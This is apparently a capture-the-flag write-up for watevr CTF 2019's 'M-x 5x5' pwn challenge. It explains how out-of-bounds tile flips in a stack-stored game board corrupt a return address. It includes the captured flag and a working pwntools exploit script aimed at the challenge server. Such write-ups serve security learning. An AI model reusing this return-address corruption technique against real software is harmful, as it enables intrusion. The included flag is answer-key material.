Tags: pwn
Rating:
See [full writeup https://github.com/happysox/CTF_Writeups/tree/master/watevr_CTF_2019/M-x_5x5](https://github.com/happysox/CTF_Writeups/tree/master/watevr_CTF_2019/M-x_5x5)
### TL;DR
[x64 binary](./M-x-5x5)
* Tile flipping game played over netcat
* Like http://www.logicgamesonline.com/lightsout/
* Board is stored on the stack
* Out of bounds "flips" = partial XOR of a return address => win function
**watevr{maybe_well_implement_M-x_tetris_some_day}**
```python
#!/usr/bin/python2
from pwn import *
with context.quiet:
#p = process('./M-x-5x5')
p = remote('13.53.187.163', 50000)
p.sendline()
p.sendlineafter('8)? ', "8") # Size of board doesn't actually matter
#gdb.attach(p, """
# b *0x4008f7
# b *0x0000000000400acc
# b *0x00000000004008ae
#""")
xors_1 = [3, 5, 6, 8]
xors_2 = [1, 4]
# Flipping the correct tiles => actually XORing
# parts of the main loop's return pointer on the stack
for x in xors_1:
p.sendlineafter('q]: ', "f %s 17" % str(x)) # Flip row 17, col x
for x in xors_2:
p.sendlineafter('q]: ', "f %s 16" % str(x)) # Flip row 16, col x
p.sendlineafter('q]: ', "q")
p.interactive()
p.close()
```